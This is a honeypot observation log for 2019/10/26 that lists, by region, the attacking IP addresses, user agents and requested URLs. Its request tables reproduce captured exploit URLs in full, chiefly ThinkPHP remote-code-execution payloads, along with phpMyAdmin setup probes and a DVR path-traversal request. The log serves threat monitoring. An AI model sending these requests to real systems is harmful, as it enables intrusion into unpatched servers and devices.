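Honeypot (provisional) observation log for 2019/10/26.
Highlights
Region:AP
The following were observed:
Access attempts targeting the ThinkPHP vulnerability (patterns different from those seen so far were also observed)
Access attempts targeting a vulnerability in Shenzhen TVT products
Scanning for phpMyAdmin
Access attempts for Dockerfile
Region:US
The following were observed:
Access attempts targeting a vulnerability in HiSilicon DVR Devices
Access attempts targeting the ThinkPHP vulnerability (patterns different from those seen so far were also observed)
Access attempts targeting a vulnerability in Shenzhen TVT products
Scanning for phpMyAdmin
Scanning by ZmEu
Region:EU
The following were observed:
Access attempts for Dockerfile
Scanning for phpMyAdmin
Scanning by ZmEu
Other
Access count trend
AP: total accesses: 71 (change from previous day: +58)
US: total accesses: 91 (change from previous day: -141)
EU: total accesses: 13 (change from previous day: +8)
For practical reasons, "GET / HTTP/1.1" and "POST / HTTP/1.1" requests are excluded.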
Region:AP
Source IP addresses
Count | Source IP address | Country |
---|---|---|
1 | 108.210.130.114 | United States |
4 | 122.51.64.238 | China |
1 | 139.199.170.242 | China |
1 | 159.203.196.79 | United States |
45 | 185.128.41.50 | Switzerland |
2 | 185.31.163.237 | Russia |
1 | 193.188.22.76 | Russia |
1 | 201.111.50.191 | Mexico |
1 | 201.124.96.224 | Mexico |
4 | 24.193.76.19 | United States |
1 | 37.34.155.11 | Kuwait |
1 | 61.219.11.153 | Taiwan |
1 | 66.249.71.121 | United States |
1 | 81.40.113.29 | Spain |
5 | 82.119.104.180 | Slovakia |
1 | 82.62.129.62 | Italy |
User-Agent list
Count | UserAgent |
---|---|
3 | - |
10 | ApiTool |
1 | curl/7.47.0 |
1 | Go-http-client/1.1 |
45 | Java/1.8.0_131 |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 |
3 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /Dockerfile | HTTP/1.1 |
1 | GET | /Dockerfile | HTTP/1.1\n |
1 | GET | /editBlackAndWhiteList | HTTP/1.1 |
3 | GET | /index.php | HTTP/1.1 |
6 | GET | /index.php?s=captcha | HTTP/1.1 |
1 | GET | /index.php?s=index/index/index | HTTP/1.1 |
1 | GET | /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=/index/\\think\\request/cache&key=1\|phpinfo | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /public/index.php | HTTP/1.1 |
3 | GET | /public/index.php?s=captcha | HTTP/1.1 |
1 | GET | /public/index.php?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=captcha | HTTP/1.1 |
1 | GET | /public/?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/?s=index/index/index | HTTP/1.1 |
1 | GET | /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=/index/\\think\\request/cache&key=1\|phpinfo | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
3 | GET | /?s=captcha | HTTP/1.1 |
1 | GET | /?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter& | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
10 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | \x03 |
Region:US
Source IP addresses
Count | Source IP address | Country |
---|---|---|
10 | 112.29.140.213 | China |
1 | 113.161.80.254 | Vietnam |
10 | 115.159.122.71 | China |
1 | 115.163.140.148 | Japan |
7 | 153.126.205.162 | Japan |
12 | 157.245.241.112 | United States |
45 | 185.128.41.50 | Switzerland |
1 | 47.41.47.93 | United States |
1 | 51.254.196.14 | France |
3 | 89.248.169.17 | Netherlands |
User-Agent list
Count | UserAgent |
---|---|
6 | - |
1 | ApiTool |
2 | Go-http-client/1.1 |
45 | Java/1.8.0_131 |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
18 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
3 | |||
2 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | HTTP/1.1 | |
5 | GET | /index.php | HTTP/1.1 |
6 | GET | /index.php?s=captcha | HTTP/1.1 |
1 | GET | /index.php?s=index/index/index | HTTP/1.1 |
1 | GET | /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=/index/\\think\\request/cache&key=1\|phpinfo | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
1 | GET | login.cgi | HTTP/1.0 |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
2 | GET | /myadmin/scripts/setup/php | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /pma/scripts/setup.php | HTTP/1.1 |
5 | GET | /public/index.php | HTTP/1.1 |
3 | GET | /public/index.php?s=captcha | HTTP/1.1 |
1 | GET | /public/index.php?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=captcha | HTTP/1.1 |
1 | GET | /public/?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/?s=index/index/index | HTTP/1.1 |
1 | GET | /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=/index/\\think\\request/cache&key=1\|phpinfo | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
3 | GET | /?s=captcha | HTTP/1.1 |
1 | GET | /?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter& | HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
3 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wp-login.php | HTTP/1.1 |
1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |
Region:EU
Source IP addresses
Count | Source IP address | Country |
---|---|---|
7 | 153.126.205.162 | Japan |
1 | 185.31.163.237 | Russia |
1 | 23.239.12.17 | United States |
4 | 71.6.199.23 | United States |
User-Agent list
Count | UserAgent |
---|---|
5 | - |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
1 | python-requests/2.19.1 |
6 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | GET | /Dockerfile | HTTP/1.1\n |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | HTTP/1.1 | |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |